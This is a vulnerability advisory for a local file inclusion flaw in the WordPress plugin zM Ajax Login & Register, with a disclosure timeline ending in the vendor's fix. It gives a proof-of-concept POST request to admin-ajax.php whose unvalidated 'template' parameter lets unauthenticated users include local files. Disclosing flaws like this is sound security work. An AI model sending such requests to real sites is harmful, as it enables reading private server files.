zM Ajax Login & Register [Local File Inclusion]

WordPress plugin zM Ajax Login & Register suffers for an Local File Inclusion vulnerability.

Description

Any authenticated or non-authenticated user can perform a local file inclusion attack by exploiting the wp_ajax_nopriv_load_template action. Plugin simply includes the file specified in ‘template’ POST parameter without any further validation.

Proof of Concept

Send a post request to

http://my.vulnerable.website.com/wp-admin/admin-ajax.php

with data:

action=load_template&template=[relative path to local file]&security=[wp nonce]&referer=[action from which the nonce came from]

WordPress Plugins Local File Inclusion LFI
INFO
TIMELINE
  • 2015-06-01:
    Discovered
  • 2015-06-01:
    Vendor alerted via contact form at his website
  • 2015-06-03:
    Vendor responded
  • 2015-06-03:
    Released version 1.1.0 that resolves the issue